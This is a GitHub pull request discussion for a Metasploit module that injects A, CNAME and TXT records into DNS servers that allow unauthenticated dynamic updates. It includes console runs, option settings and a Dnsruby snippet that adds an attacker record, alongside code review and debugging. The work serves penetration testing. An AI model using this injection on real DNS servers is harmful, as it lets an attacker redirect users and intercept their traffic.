### PR TITLE
Adding DNS Server Dynamic Update Record Injection module

### PR DESCRIPTION
**Pull request by KINGSABRI**
It's an exploit for DNS server misconfiguration that allows ANY to update the DNS server records.

The main finding was shown in a[ Nessus plugin](http://www.tenable.com/plugins/index.php?view=single&id=35372) 
## Verification

```
$msfconsole -q 

use auxiliary/scanner/dns/dyn_dns_update
msf auxiliary(dyn_dns_update) > show options

Module options (auxiliary/scanner/dns/dyn_dns_update):

   Name          Current Setting      Required  Description
   ----          ---------------      --------  -----------
   DOMAIN        vulnerable.loc       yes       The domain name
   INJECTDOMAIN  pwnd.vulnerable.loc  yes       The name record you want to inject
   INJECTIP      192.168.100.10       yes       The IP you want to assign to the injected record
   NS            172.16.16.142        yes       The vulnerable DNS server IP address


Auxiliary action:

   Name  Description
   ----  -----------
   ADD   Add a new record. [Default]

msf auxiliary(dyn_dns_update) > run


[*] Sending DNS query payload...
[+] The record 'pwnd.vulnerable.loc => 192.168.100.10' has been added!
[*] Auxiliary module execution completed

```

On the DNS server, you'll find a new record
dns-pwnd1

On windows, DNS server must be configured as follows
dns_conf
## Issues

I'm trying to find a better way to resolve the injected domain after adding/deleting to confirm adding/deleting the record before printing the success message to the user.

Some tries are commented in the code. A little hand here, plz

### CODE REVIEW

File: modules/auxiliary/scanner/dns/dyn_dns_update.rb [hunk 1]
```diff
@@ -0,0 +1,178 @@
...
+        ], self.class)
+
+    deregister_options( 'RHOST', 'RPORT' )
+
+  end
+
+  #
+  # Update String class for easir domain and IP processing
+  #
+  class ::String
```
Comment (sempervictus) [inline modules/auxiliary/scanner/dns/dyn_dns_update.rb]: This is less than ideal, and changes the standard library String class implementation across the Framework instance. Suggest local instance methods which take the string as a parameter on which to operate. You might also look at Rex::Text for some inspiration, lots of fun stuff in there.

**Comment by sempervictus** [comment]
@devs: could we get #6611 merged in? DNS attacks are very common, and people keep trying to use net/dns for this which prevents our use of pivoted sockets (already merged).

@KINGSABRI: nice module, thank you. Very useful trick to have in the arsenal. I dont see references in here, does this have a CVEID assigned yet? Far as checking the resulting DNS record, creating a resolver instance/configuring one with the target server set as the NS and checking for it seems rational. Might want to throw in a tiny delay to ensure the record is created and accessible, or a short retry loop (noisier). Since you'd have to have had ingress to create the record, the same transport should be usable to validate it. I dont want to suggest instantiating a module-instance resolver or specific code paths until we hear back from @r7 folks about merging the DNS work, but if thats stalled for some reason, we can borrow from there to instantiate the module-local-instance of the resolver, configure it, and both push the record and check it from the same object.

File: modules/auxiliary/scanner/dns/dyn_dns_update.rb (hunk 1 above)
Comment (KINGSABRI) [inline modules/auxiliary/scanner/dns/dyn_dns_update.rb]: Yes, I see, but I couldn't find an elegant way to do it and keep user outputs as it should be. 

pls advise

**Comment by KINGSABRI** [comment]
Thanks @sempervictus it's really useful whoever is not known on the wild for some reason.

- The main reference is the tenable plugin. I found it due PT and I didn't find many people talking about it except the python script writer 
- There is no CVE for it since it's a misconfiguration

File: modules/auxiliary/scanner/dns/dyn_dns_update.rb (hunk 1 above)
Comment (sempervictus) [inline modules/auxiliary/scanner/dns/dyn_dns_update.rb]: When written as:
```
def domain_to_raw(domain_name)
  return domain_name.split('.').map do |part|
    part_size  = '%02x' % part.size
    domain2hex = part.each_byte.map{|byte| '%02x' %  byte}.join
    part_size + domain2hex
  end.join.scan(/../).map { |x| x.hex.chr }.join
end

def ip_to_hex(ip_addr)
  return ip_addr.split(".").map(&:to_i).pack("C*")
end
```
The methods produce:
```
2.3.1 :012 > domain_to_raw 'test.domain.nil'
 => "\x04test\x06domain\x03nil"
2.3.1 :013 > ip_to_hex('10.1.1.1')
 => "\n\x01\x01\x01" 
```
The original code produces:
```
2.3.1 :028 > 'test.domain.nil'.domain_to_raw
 => "\x04test\x06domain\x03nil" 
2.3.1 :029 > '10.1.1.1'.ip_to_hex
 => "\n\x01\x01\x01" 
```
Outputs look the same at first glance, and ::String is unaffected.
Thoughts?

**Comment by sempervictus** [comment]
@KINGSABRI If you're not seeing hiccups, then i'd drop the delay idea unless we see some reason to implement it.
I'll take a stab at porting this to the native DNS code we run in-house and send a PR in case @devs are able to merge the native functionality.

Far as attack vectors go here, this is a bit terrifying as DNS records are propagated across the domain. If you have a single bad server, or foothold in a single site, you can poison the replicas like this through DNS propagation and spoof their users to hit the IP associated with the record.

File: modules/auxiliary/scanner/dns/dyn_dns_update.rb (hunk 1 above)
Comment (KINGSABRI) [inline modules/auxiliary/scanner/dns/dyn_dns_update.rb]: Yes, it's the same, 
I'll change it to what you've suggested

**Comment by KINGSABRI** [comment]
@sempervictus 
>Far as attack vectors go here, this is a bit terrifying as DNS records are propagated across the domain. If you have a single bad server, or foothold in a single site, you can poison the replicas like this through DNS propagation and spoof their users to hit the IP associated with the record.

Exactly, Once you can update the DNS records in a network fully controlled by LDAP/AD you can close your eyes and imagine what you can do. The strange part is, nessus score it as medium finding. 

If you see that porting the module to the MSF native DNS and this what will be applied to all DNS related modules, then go ahead please. 

Still have much details about the native DNS implementation since I don't write modules regularly. 
Thanks for your help man

**Comment by sempervictus** [comment]
Glad to be of help, the native implementation hasn't been merged, so nobody really knows about it unless they religiously troll pull requests. Will try to get a scaffold of the PR in over the next 24h if i can hack on it during meetings :).
Glanced over the latest changes, lgtm on the stdlib class modification concern.

**Comment by KINGSABRI** [comment]
Hello guys
Any update regarding the DNS resolve issue? 

Thanks!

**Comment by sempervictus** [comment]
I'm mostly done with my changes, need to test and verify I didn't break
anything, but you should have a PR today.
Far as DNS in lib goes, seems they are restructuring Rex right now into
separate gems... May take a bit.

**Comment by sempervictus** [comment]
@KINGSABRI: Native PR created against this branch in your repo
@all: #6611 updated with :client convenience method.

**Comment by sempervictus** [comment]
Thank you for merging the native implementation, but i should probably have been explicit in saying that the PR creates a dependency on #6611 (@devs...?), which will cause test failures until that code hits master  (or we figure out how to tell Travis to merge that PR into the testbed prior to testing this one). You may want to _git revert -m1 9befe79_ for the time being to pass tests and potentially be merged prior to #6611. We already have the required diff to implement native DNS, so even if this hits first, we can just submit the PR i gave you once native DNS gets upstream.

**Comment by KINGSABRI** [comment]
@sempervictus do you think DNS native is going to be merged soon? 

A general question, Do I need to create a documentation for this module?

**Comment by sempervictus** [comment]
Docs are always good, please add all you can.
I'm actually unsure as to why native DNS is not merged yet. Likely needs
review by someone familiar with Rex.

@bcook-r7: SYN...
On Jul 1, 2016 7:30 PM, "KING SABRI" <notifications@github.com> wrote:

@sempervictus <https://github.com/sempervictus> do you think DNS native is
going to be merged soon?

A general question, Do I need to create a documentation for this module?

—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub
<https://github.com/rapid7/metasploit-framework/pull/7017#issuecomment-230067761>,
or mute the thread
<https://github.com/notifications/unsubscribe/ABRPjCnA0foRlObesFStiJ21bK6QZwEwks5qRaLygaJpZM4I9SHc>
.

**Comment by KINGSABRI** [comment]
@sempervictus Thanks for answering my questions. 
I'll check what it needs to create the docs since I didn't do that before

**Comment by KINGSABRI** [comment]
Hello @all 
I don't know where you've decided to go with? is it with @sempervictus implementation or you'll use `Dnsruby`


Dnsruby is pretty mature and it will cut code complexity almost 70% since no need to write these binary strings anymore and we'll use something simple as 

```ruby
attaker_ip = '172.16.16.1'
attcker_domain = 'attacker4.goov.gov'
dns_server = '172.16.16.142'
# Create the update packet.
update = Dnsruby::Update.new(dns_server)
# Prerequisite is that no A records exist for the name.
update.absent("#{attcker_domain}.", 'A')
# Add two A records for the name.
update.add("#{attcker_domain}.", 'A', 86400, attaker_ip)
```

And much more 

So please advice

**Comment by busterb** [comment]
hi @KINGSABRI, thanks for getting the ball rolling again.

I checked with the guys doing the REX gem stuff. It seems they're stopping at the border of the protocol libraries for now. In other words, I think some of the original concerns about landing #6611 on grounds that rex gems will soon take over the world, are removed.

Now, on Dnsruby, that's something that @hdm was advocating for too IIRC, and net-dns was the primary objection against #6611. I think that's basically why we got stuck - it was an improvement, but not perfect. Maybe this plan global plan, as a way to move forward:

  - update this module to use Dnsruby, show benefits and API usage, land it, .... profit!
  - update #6611 to also use Dnsruby, so we have a pivoting / channelized version as well
  - update existing modules to use the new channelized abstraction version

Does that sound reasonable?

**Comment by KINGSABRI** [comment]
@busterb thanks for reply. I'd vote up for `Dnsruby` rather `net-dense because `Dnsruby` is more RFC compliant plus it includes DNSSEC.

>- update this module to use Dnsruby, show benefits and API usage, land it, .... profit!

I can do that 

>- update #6611 to also use Dnsruby, so we have a pivoting / channelized version as well

I'm not sure 

>- update existing modules to use the new channelized abstraction version

I'd love to do that once you guys agree on the Dnsruby implementation on this module, I'll make it as a test case

**Comment by KINGSABRI** [comment]
I'm trying to make it update on all possible records (A, CNAME, TXT, MX). The MX and CNAME is not working yet and I'm working on it

```
msf > use auxiliary/scanner/dns/dyn_dns_update 
msf auxiliary(dyn_dns_update) > show options 

Module options (auxiliary/scanner/dns/dyn_dns_update):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DOMAIN                         yes       The domain name
   INJECTDOMAIN                   yes       The name record you want to inject
   INJECTIP                       yes       The IP you want to assign to the injected record
   NS                             yes       The vulnerable DNS server IP address
   TYPE          A                yes       The record type you want to inject. (Accepted: A, CNAME, TXT, MX)


Auxiliary action:

   Name  Description
   ----  -----------
   ADD   Add a new record. [Default]


msf auxiliary(dyn_dns_update) > show advanced 

Module advanced options (auxiliary/scanner/dns/dyn_dns_update):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   TXTSTRING  w00t             yes       The string to be injected with TXT record
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module
```

## Options

**A record**

```
set DOMAIN vulnerable.zone
set NS 172.16.16.134
set INJECTDOMAIN pwnd.vulnerable.zone
set INJECTIP 172.16.16.1
set TYPE A
set ACTION ADD
run
```

**TXT record**

```
set DOMAIN vulnerable.zone
set NS 172.16.16.134
set INJECTDOMAIN pwnd.vulnerable.zone
set INJECTIP 172.16.16.1
set TYPE TXT
set ACTION ADD
set TXTSTRING w00t
run
```


`Dnsruby` makes live much easier and code much neater

**Comment by KINGSABRI** [comment]
Now CNAME record is working. 

I'd love someone to test and confirm to proceed

**Comment by busterb** [comment]
Hi and thanks for the updates @KINGSABRI. It seems like we could use some Dnsruby-specific error handling in the module dealing with failure modes. Pointing it at 'nc -lu 127.0.0.1 53', I can get a few backtraces from the module. Not bad (Dnsruby is doing the right thing), but I think handling the Dnsruby exceptions would be a good step at the module level.

```
msf auxiliary(dyn_dns_update) > run

[*] Sending DNS query payload...
[-] Auxiliary failed: Dnsruby::OtherResolvError recvfrom failed from 127.0.0.1; Connection refused - recvfrom(2)
[-] Call stack:
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.59.3/lib/dnsruby/resolver.rb:256:in `send_message'
[-]   /home/bcook/projects/metasploit-framework/modules/auxiliary/scanner/dns/dyn_dns_update.rb:60:in `a_record'
[-]   /home/bcook/projects/metasploit-framework/modules/auxiliary/scanner/dns/dyn_dns_update.rb:167:in `run'
[*] Auxiliary module execution completed
msf auxiliary(dyn_dns_update) > run

[*] Sending DNS query payload...
[-] Auxiliary failed: Dnsruby::DecodeError requested position of 12 must be between 0 and buffer size (8).
[-] Call stack:
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.59.3/lib/dnsruby/message/decoder.rb:32:in `assert_buffer_position_valid'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.59.3/lib/dnsruby/message/decoder.rb:90:in `get_unpack'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.59.3/lib/dnsruby/message/header.rb:224:in `decode'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.59.3/lib/dnsruby/message/header.rb:81:in `initialize'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.59.3/lib/dnsruby/message/message.rb:569:in `new'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.59.3/lib/dnsruby/message/message.rb:569:in `block in decode'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.59.3/lib/dnsruby/message/decoder.rb:20:in `initialize'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.59.3/lib/dnsruby/message/message.rb:568:in `new'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.59.3/lib/dnsruby/message/message.rb:568:in `decode'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.59.3/lib/dnsruby/select_thread.rb:516:in `get_incoming_data'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.59.3/lib/dnsruby/select_thread.rb:281:in `block in process_ready'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.59.3/lib/dnsruby/select_thread.rb:276:in `each'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.59.3/lib/dnsruby/select_thread.rb:276:in `process_ready'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.59.3/lib/dnsruby/select_thread.rb:221:in `do_select'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.59.3/lib/dnsruby/select_thread.rb:153:in `block in check_select_thread_synchronized'
[*] Auxiliary module execution completed
```

**Comment by KINGSABRI** [comment]
I tried 

```
ncat -ulvp 53
Ncat: Version 7.01 ( https://nmap.org/ncat )
Ncat: Listening on :::53
Ncat: Listening on 0.0.0.0:53
```


```
msf auxiliary(dyn_dns_update) > show options 

Module options (auxiliary/scanner/dns/dyn_dns_update):

   Name          Current Setting     Required  Description
   ----          ---------------     --------  -----------
   DOMAIN        vulnerable.zone     yes       The domain name
   INJECTDOMAIN  ss.vulnerable.zone  yes       The name record you want to inject
   INJECTIP      192.168.100.10      yes       The IP you want to assign to the injected record
   NS            127.0.0.1           yes       The vulnerable DNS server IP address
   TYPE          A                   yes       The record type you want to inject. (Accepted: A, CNAME, TXT, MX)


Auxiliary action:

   Name  Description
   ----  -----------
   ADD   Add a new record. [Default]


msf auxiliary(dyn_dns_update) > run

[*] Sending DNS query payload...
[-] Auxiliary triggered a timeout exception
[*] Auxiliary module execution completed
msf auxiliary(dyn_dns_update) > 
```


@busterb Thanks for following 
How did setup the your scenario to get this error?

**Comment by busterb** [comment]
First exception - nothing listening.
Second exception, setup nc listener, on connect, send some garbage characters.

**Comment by KINGSABRI** [comment]
@busterb Thanks, exceptions have been added for connection refused and Dnsruby::DecodeError

**Comment by KINGSABRI** [comment]
Would we may get your advice here, please? @wchen-r7 @wvu-r7

**Comment by wvu-r7** [comment]
Some ```rescue Exception``` still going on. Only a few left!

**Comment by KINGSABRI** [comment]
@wvu-r7 I'm working on the MX record, I don't know why it doesn't work for me yet
I'll try to finish it soon

**Comment by busterb** [comment]
Deleting a CNAME seems to work, but it shows up as an error:
```
msf auxiliary(dyn_dns_update) > show options 

Module options (auxiliary/scanner/dns/dyn_dns_update):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DOMAIN        ms7017           yes       The domain name
   INJECTDOMAIN  dog.ms7017       yes       The name record you want to inject
   INJECTIP      192.168.56.3     yes       The IP you want to assign to the injected record
   NS            192.168.56.2     yes       The vulnerable DNS server IP address
   TYPE          CNAME            yes       The record type you want to inject. (Accepted: A, CNAME, TXT, MX)


Auxiliary action:

   Name  Description
   ----  -----------
   ADD   Add a new record. [Default]

msf auxiliary(dyn_dns_update) > run

[*] Sending DNS query payload...
[+] The record 'dog.ms7017 => ms7017' has been added!
[*] Auxiliary module execution completed
msf auxiliary(dyn_dns_update) > run

[*] Sending DNS query payload...
[-] Can't inject dog.ms7017. Make sure the DNS server is vulnerable or domain already exists.
[*] Auxiliary module execution completed
msf auxiliary(dyn_dns_update) > set action DEL
action => DEL
msf auxiliary(dyn_dns_update) > run

[*] Sending DNS query payload...
[-] None DNS protocol answer!, Make sure it's a DNS service
[*] Auxiliary module execution completed
msf auxiliary(dyn_dns_update) > set action ADD 
action => ADD
msf auxiliary(dyn_dns_update) > run

[*] Sending DNS query payload...
[+] The record 'dog.ms7017 => ms7017' has been added!
[*] Auxiliary module execution completed
```

**Comment by busterb** [comment]
Yeah, MX throws an exception (testing against Server 2016)
Duplicate record
```
msf auxiliary(dyn_dns_update) > run

[*] Sending DNS query payload...
[!] Not implemented yet.
[-] Can't inject dog.ms7017. Make sure the DNS server is vulnerable or domain already exists.
[-] Auxiliary failed: ArgumentError cannot interpret as DNS name: nil
[-] Call stack:
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.60.0/lib/dnsruby/name.rb:60:in `create'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.60.0/lib/dnsruby/resource/MX.rb:42:in `from_string'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.60.0/lib/dnsruby/resource/RR.rb:113:in `initialize'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.60.0/lib/dnsruby/resource/RR.rb:282:in `new'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.60.0/lib/dnsruby/resource/RR.rb:282:in `_get_subclass'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.60.0/lib/dnsruby/resource/RR.rb:245:in `new_from_string'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.60.0/lib/dnsruby/resource/RR.rb:402:in `create'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.60.0/lib/dnsruby/update.rb:238:in `add'
[-]   /home/bcook/projects/metasploit-framework/modules/auxiliary/scanner/dns/dyn_dns_update.rb:142:in `mx_record'
[-]   /home/bcook/projects/metasploit-framework/modules/auxiliary/scanner/dns/dyn_dns_update.rb:175:in `run'
```
New record
```
msf auxiliary(dyn_dns_update) > set INJECTDOMAIN cat.ms7017
INJECTDOMAIN => cat.ms7017
msf auxiliary(dyn_dns_update) > run

[*] Sending DNS query payload...
[!] Not implemented yet.
[+] The record 'cat.ms7017 => 192.168.56.3' has been added!
[-] Auxiliary failed: ArgumentError cannot interpret as DNS name: nil
[-] Call stack:
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.60.0/lib/dnsruby/name.rb:60:in `create'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.60.0/lib/dnsruby/resource/MX.rb:42:in `from_string'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.60.0/lib/dnsruby/resource/RR.rb:113:in `initialize'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.60.0/lib/dnsruby/resource/RR.rb:282:in `new'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.60.0/lib/dnsruby/resource/RR.rb:282:in `_get_subclass'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.60.0/lib/dnsruby/resource/RR.rb:245:in `new_from_string'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.60.0/lib/dnsruby/resource/RR.rb:402:in `create'
[-]   /home/bcook/.rvm/gems/ruby-2.3.1@metasploit-framework/gems/dnsruby-1.60.0/lib/dnsruby/update.rb:238:in `add'
[-]   /home/bcook/projects/metasploit-framework/modules/auxiliary/scanner/dns/dyn_dns_update.rb:142:in `mx_record'
[-]   /home/bcook/projects/metasploit-framework/modules/auxiliary/scanner/dns/dyn_dns_update.rb:175:in `run'
[*] Auxiliary module execution completed
```

**Comment by busterb** [comment]
I'm going to remove the mx support since I think that's the only thing that doesn't work here.

**Comment by busterb** [comment]
I rebased this and put up PR #8599 for verification.

**Pull request closed without merging**